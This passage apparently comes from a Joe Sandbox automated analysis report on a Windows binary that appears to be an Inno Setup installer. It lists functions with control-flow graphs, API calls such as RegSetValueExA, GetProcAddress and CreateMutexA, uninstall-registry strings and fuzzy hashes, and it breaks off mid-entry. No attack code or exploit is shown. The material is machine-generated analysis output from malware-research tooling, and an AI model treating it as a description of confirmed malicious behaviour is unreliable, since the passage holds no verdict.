                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453D04 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                          • Instruction ID: 0cfc6298fdd12068752ce7e5f45c2d53baaa1050ce66cc5593b8e4691a5d7c37
                                                                          • Opcode Fuzzy Hash: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
                                                                          • Instruction Fuzzy Hash: 69D0C2B120420053C300AE68DC8269635AC8B84356F10483E7C85CB3C3EA7CDF4D566A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042ED54 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042ED70
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                          • Instruction ID: 792271a71424278b40c344544890263380edecd1d6d7572d4222c7646c861560
                                                                          • Opcode Fuzzy Hash: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
                                                                          • Instruction Fuzzy Hash: 0FD05E7121010DAB8B00DE99E880C6B33AC9B88740B608805F518C7205C634EC1087A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046AA8C Relevance: 68.7, APIs: 1, Strings: 38, Instructions: 412registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 409 46aa8c-46aabc 410 46aac7 409->410 411 46aabe-46aac5 409->411 412 46aace-46ab06 call 403634 call 403738 call 42dcf8 410->412 411->412 419 46ab21-46ab4a call 403738 call 42dc1c 412->419 420 46ab08-46ab1c call 403738 call 42dcf8 412->420 428 46ab4c-46ab55 call 46a75c 419->428 429 46ab5a-46ab83 call 46a878 419->429 420->419 428->429 433 46ab95-46ab98 call 403400 429->433 434 46ab85-46ab93 call 403494 429->434 438 46ab9d-46abe8 call 46a878 call 42c36c call 46a8c0 call 46a878 433->438 434->438 447 46abfe-46ac1f call 453d04 call 46a878 438->447 448 46abea-46abfd call 46a8e8 438->448 455 46ac75-46ac7c 447->455 456 46ac21-46ac74 call 46a878 call 4746ec call 46a878 call 4746ec call 46a878 447->456 448->447 457 46ac7e-46acbb call 4746ec call 46a878 call 4746ec call 46a878 455->457 458 46acbc-46acc3 455->458 456->455 457->458 461 46ad04-46ad08 458->461 462 46acc5-46ad03 call 46a878 * 3 458->462 466 46ad17-46ad20 call 403494 461->466 467 46ad0a-46ad15 call 476f14 461->467 462->461 474 46ad25-46aef2 call 403778 call 46a878 call 476f14 call 46a8c0 call 403494 call 40357c * 2 call 46a878 call 403494 call 40357c * 2 call 46a878 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 call 46a8c0 call 476f14 466->474 467->474 553 46aef4-46af06 call 46a878 474->553 554 46af08-46af16 call 46a8e8 474->554 559 46af1c-46af65 call 46a8e8 call 46a91c call 46a878 call 476f14 call 46a980 553->559 558 46af1b 554->558 558->559 570 46af67-46af85 call 46a8e8 * 2 559->570 571 46af8b-46af92 559->571 579 46af8a 570->579 573 46af94-46afca call 48ebc0 571->573 574 46afec-46b002 RegCloseKey 571->574 573->574 579->571
                                                                          APIs
                                                                            • Part of subcall function 0046A878: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                          • RegCloseKey.ADVAPI32(?,0046B00A,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B055,?,?,00000001,004950AC), ref: 0046AFFD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: " /SILENT$5.3.4 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3132538880-4027905794
                                                                          • Opcode ID: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                          • Instruction ID: bcc948474739f7d4ff28eebc8c8e5d3f87406a7e72996d7d4e0226daa9b19a94
                                                                          • Opcode Fuzzy Hash: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
                                                                          • Instruction Fuzzy Hash: 70F15870A005099BCB04EB55D8519AEB7B9EB44304F60C07BE811AB395EB78BD46CF5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048C62C Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 972 48c62c-48c660 call 403684 975 48c662-48c671 call 446830 Sleep 972->975 976 48c676-48c683 call 403684 972->976 981 48cb06-48cb20 call 403420 975->981 982 48c6b2-48c6bf call 403684 976->982 983 48c685-48c6a8 call 44688c call 403738 FindWindowA call 446b0c 976->983 990 48c6ee-48c6fb call 403684 982->990 991 48c6c1-48c6e9 call 44688c call 403738 FindWindowA call 446b0c 982->991 999 48c6ad 983->999 1001 48c6fd-48c73f call 446830 * 4 SendMessageA call 446b0c 990->1001 1002 48c744-48c751 call 403684 990->1002 991->981 999->981 1001->981 1011 48c7a0-48c7ad call 403684 1002->1011 1012 48c753-48c79b call 446830 * 4 PostMessageA call 446964 1002->1012 1021 48c7fc-48c809 call 403684 1011->1021 1022 48c7af-48c7f7 call 446830 * 4 SendNotifyMessageA call 446964 1011->1022 1012->981 1033 48c80b-48c831 call 44688c call 403738 RegisterClipboardFormatA call 446b0c 1021->1033 1034 48c836-48c843 call 403684 1021->1034 1022->981 1033->981 1046 48c884-48c891 call 403684 1034->1046 1047 48c845-48c87f call 446830 * 3 SendMessageA call 446b0c 1034->1047 1061 48c8d8-48c8e5 call 403684 1046->1061 1062 48c893-48c8d3 call 446830 * 3 PostMessageA call 446964 1046->1062 1047->981 1073 48c92c-48c939 call 403684 1061->1073 1074 48c8e7-48c927 call 446830 * 3 SendNotifyMessageA call 446964 1061->1074 1062->981 1084 48c93b-48c959 call 44688c call 42e1f0 1073->1084 1085 48c98e-48c99b call 403684 1073->1085 1074->981 1105 48c96b-48c979 GetLastError call 446b0c 1084->1105 1106 48c95b-48c969 call 446b0c 1084->1106 1096 48c99d-48c9c9 call 44688c call 403738 call 446830 GetProcAddress 1085->1096 1097 48ca15-48ca22 call 403684 1085->1097 1130 48c9cb-48ca00 call 446830 * 2 call 446b0c call 446964 1096->1130 1131 48ca05-48ca10 call 446964 1096->1131 1111 48ca4a-48ca57 call 403684 1097->1111 1112 48ca24-48ca45 call 446830 FreeLibrary call 446964 1097->1112 1114 48c97e-48c989 call 446b0c 1105->1114 1106->1114 1124 48ca59-48ca77 call 44688c call 403738 CreateMutexA 1111->1124 1125 48ca7c-48ca89 call 403684 1111->1125 1112->981 1114->981 1124->981 1139 48ca8b-48cabd call 4869a8 call 403574 call 403738 OemToCharBuffA call 4869c0 1125->1139 1140 48cabf-48cacc call 403684 1125->1140 1130->981 1131->981 1139->981 1149 48cace-48cb00 call 4869a8 call 403574 call 403738 CharToOemBuffA call 4869c0 1140->1149 1150 48cb02 1140->1150 1149->981 1150->981
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,0048CB21,?,?,?,?,00000000,00000000,00000000), ref: 0048C66C
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 0048C69D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309
                                                                          • Opcode ID: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                          • Instruction ID: f524c342f64002353724253178373006bfdacafd8b11f716a45f6a977dbd9a74
                                                                          • Opcode Fuzzy Hash: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
                                                                          • Instruction Fuzzy Hash: 70C18560B0061027D714FB7E9C8261E66999F95704B11DD3FB446EB78ACE3DEC05836E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047DC90 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1477 47dc90-47dcb5 GetModuleHandleA GetProcAddress 1478 47dcb7-47dccd GetNativeSystemInfo GetProcAddress 1477->1478 1479 47dd1c-47dd21 GetSystemInfo 1477->1479 1480 47dd26-47dd2f 1478->1480 1481 47dccf-47dcda GetCurrentProcess 1478->1481 1479->1480 1482 47dd31-47dd35 1480->1482 1483 47dd3f-47dd46 1480->1483 1481->1480 1490 47dcdc-47dce0 1481->1490 1484 47dd37-47dd3b 1482->1484 1485 47dd48-47dd4f 1482->1485 1486 47dd61-47dd66 1483->1486 1488 47dd51-47dd58 1484->1488 1489 47dd3d-47dd5a 1484->1489 1485->1486 1488->1486 1489->1486 1490->1480 1492 47dce2-47dce9 call 4510a0 1490->1492 1492->1480 1495 47dceb-47dcf8 GetProcAddress 1492->1495 1495->1480 1496 47dcfa-47dd11 GetModuleHandleA GetProcAddress 1495->1496 1496->1480 1497 47dd13-47dd1a 1496->1497 1497->1480
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047DCA1
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047DCAE
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DCBC
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047DCC4
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047DCD0
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047DCF1
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047DD04
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047DD0A
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DD21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                          • Instruction ID: 9223080a01aab665d55f2b56f17608545a072cc335287f1292a6e5765a842dfc
                                                                          • Opcode Fuzzy Hash: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
                                                                          • Instruction Fuzzy Hash: AD11E241C2574094EA31B7B58E4ABFB2678CF12758F18C43B784C662C3D67CD8448A6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004651A8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1498 4651a8-4651e0 call 476f14 1501 4651e6-4651f6 call 473d54 1498->1501 1502 4653c2-4653dc call 403420 1498->1502 1507 4651fb-465240 call 40785c call 403738 call 42dc54 1501->1507 1513 465245-465247 1507->1513 1514 46524d-465262 1513->1514 1515 4653b8-4653bc 1513->1515 1516 465277-46527e 1514->1516 1517 465264-465272 call 42db84 1514->1517 1515->1502 1515->1507 1519 465280-4652a2 call 42db84 call 42db9c 1516->1519 1520 4652ab-4652b2 1516->1520 1517->1516 1519->1520 1537 4652a4 1519->1537 1521 4652b4-4652d9 call 42db84 * 2 1520->1521 1522 46530b-465312 1520->1522 1545 4652db-4652e4 call 4747e0 1521->1545 1546 4652e9-4652fb call 42db84 1521->1546 1525 465314-465326 call 42db84 1522->1525 1526 465358-46535f 1522->1526 1538 465336-465348 call 42db84 1525->1538 1539 465328-465331 call 4747e0 1525->1539 1531 465361-465395 call 42db84 * 3 1526->1531 1532 46539a-4653b0 RegCloseKey 1526->1532 1531->1532 1537->1520 1538->1526 1552 46534a-465353 call 4747e0 1538->1552 1539->1538 1545->1546 1546->1522 1555 4652fd-465306 call 4747e0 1546->1555 1552->1526 1555->1522
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,004653C2,?,?,00000001,00000000,00000000,004653DD,?,00000000,00000000,?), ref: 004653AB
                                                                          Strings
                                                                          • Inno Setup: User Info: Organization, xrefs: 0046537A
                                                                          • Inno Setup: App Path, xrefs: 0046526A
                                                                          • Inno Setup: User Info: Serial, xrefs: 0046538D
                                                                          • Inno Setup: Deselected Components, xrefs: 004652EC
                                                                          • Inno Setup: Icon Group, xrefs: 00465286
                                                                          • Inno Setup: Selected Components, xrefs: 004652CA
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00465339
                                                                          • Inno Setup: User Info: Name, xrefs: 00465367
                                                                          • Inno Setup: Selected Tasks, xrefs: 00465317
                                                                          • Inno Setup: Setup Type, xrefs: 004652BA
                                                                          • %s\%s_is1, xrefs: 00465225
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00465207
                                                                          • Inno Setup: No Icons, xrefs: 00465293
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                          • Instruction ID: 4ab213a2d8ea7f563b4f24483654b6d3db0bb1d5b93a3c7cd1a46aaae94220a2
                                                                          • Opcode Fuzzy Hash: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
                                                                          • Instruction Fuzzy Hash: 5251D630A00A449BCB11DB65D9517DEBBF5EF44344FA084BAE844A7392E778AF45CB09
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004237E4 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1716 4237e4-4237ee 1717 423917-42391b 1716->1717 1718 4237f4-423816 call 41f334 GetClassInfoA 1716->1718 1721 423847-423850 GetSystemMetrics 1718->1721 1722 423818-42382f RegisterClassA 1718->1722 1724 423852 1721->1724 1725 423855-42385f GetSystemMetrics 1721->1725 1722->1721 1723 423831-423842 call 408c24 call 40311c 1722->1723 1723->1721 1724->1725 1727 423861 1725->1727 1728 423864-4238c0 call 403738 call 406300 call 403400 call 4235bc SetWindowLongA 1725->1728 1727->1728 1739 4238c2-4238d5 call 4240e8 SendMessageA 1728->1739 1740 4238da-423908 GetSystemMenu DeleteMenu * 2 1728->1740 1739->1740 1740->1717 1742 42390a-423912 DeleteMenu 1740->1742 1742->1717
                                                                          APIs
                                                                            • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                          • GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
                                                                          • RegisterClassA.USER32(00493630), ref: 00423827
                                                                          • GetSystemMetrics.USER32(00000000), ref: 00423849
                                                                          • GetSystemMetrics.USER32(00000001), ref: 00423858
                                                                          • SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
                                                                          • SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
                                                                          • GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID: 5B
                                                                          • API String ID: 183575631-3738334870
                                                                          • Opcode ID: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                          • Instruction ID: 904541913dac979c95981ef11fb7d46e22315ee65c5a1a9273e4e0c77d2e9a1f
                                                                          • Opcode Fuzzy Hash: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                          • Instruction Fuzzy Hash: 073161B17402107AEB20AF65DC82F6B36989715709F10017BBA41AF2D7C67DED01876C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004779B4 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1855 4779b4-477a0a call 42c36c call 4035c0 call 477630 call 450f5c 1864 477a16-477a25 call 450f5c 1855->1864 1865 477a0c-477a11 call 451cc8 1855->1865 1869 477a27-477a2d 1864->1869 1870 477a3f-477a45 1864->1870 1865->1864 1871 477a4f-477a57 call 403494 1869->1871 1872 477a2f-477a35 1869->1872 1873 477a47-477a4d 1870->1873 1874 477a5c-477a84 call 42e1f0 * 2 1870->1874 1871->1874 1872->1870 1877 477a37-477a3d 1872->1877 1873->1871 1873->1874 1881 477a86-477aa6 call 40785c call 451cc8 1874->1881 1882 477aab-477ac5 GetProcAddress 1874->1882 1877->1870 1877->1871 1881->1882 1884 477ac7-477acc call 451cc8 1882->1884 1885 477ad1-477aee call 403400 * 2 1882->1885 1884->1885
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(6E560000,SHGetFolderPathA), ref: 00477AB6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-1343262939
                                                                          • Opcode ID: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                          • Instruction ID: 49185784d2d2767166d0e9f92b0e194c902f92e05003c5a198be5f154938151e
                                                                          • Opcode Fuzzy Hash: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                          • Instruction Fuzzy Hash: 2D310030A042099FDB11EB95D8829DEB7B5EB44308FA08577E804E7351D778AF45CBAC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042ED94 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1893 42ed94-42ed9e 1894 42eda0-42eda3 call 402d30 1893->1894 1895 42eda8-42ede5 call 402b30 GetActiveWindow GetFocus call 41ee14 1893->1895 1894->1895 1901 42edf7-42edff 1895->1901 1902 42ede7-42edf1 RegisterClassA 1895->1902 1903 42ee86-42eea2 SetFocus call 403400 1901->1903 1904 42ee05-42ee36 CreateWindowExA 1901->1904 1902->1901 1904->1903 1905 42ee38-42ee7c call 4241ec call 403738 CreateWindowExA 1904->1905 1905->1903 1912 42ee7e-42ee81 ShowWindow 1905->1912 1912->1903
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042EDC3
                                                                          • GetFocus.USER32 ref: 0042EDCB
                                                                          • RegisterClassA.USER32(004937AC), ref: 0042EDEC
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042EEC0,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EE2A
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042EE70
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042EE81
                                                                          • SetFocus.USER32(00000000,00000000,0042EEA3,?,?,?,00000001,00000000,?,00456712,00000000,00494628), ref: 0042EE88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: (FI$TWindowDisabler-Window
                                                                          • API String ID: 3167913817-373594729
                                                                          • Opcode ID: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                          • Instruction ID: da0a8043275c7bf3a93fe4eefa1d540893f351b9f71510032f8cfd414f1a65c9
                                                                          • Opcode Fuzzy Hash: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                          • Instruction Fuzzy Hash: 6721B2B1740711BAE220EF62DC02F1B76A8EB45B04F61413BF600AB2D1D7BC6D11C6AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00451B74 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
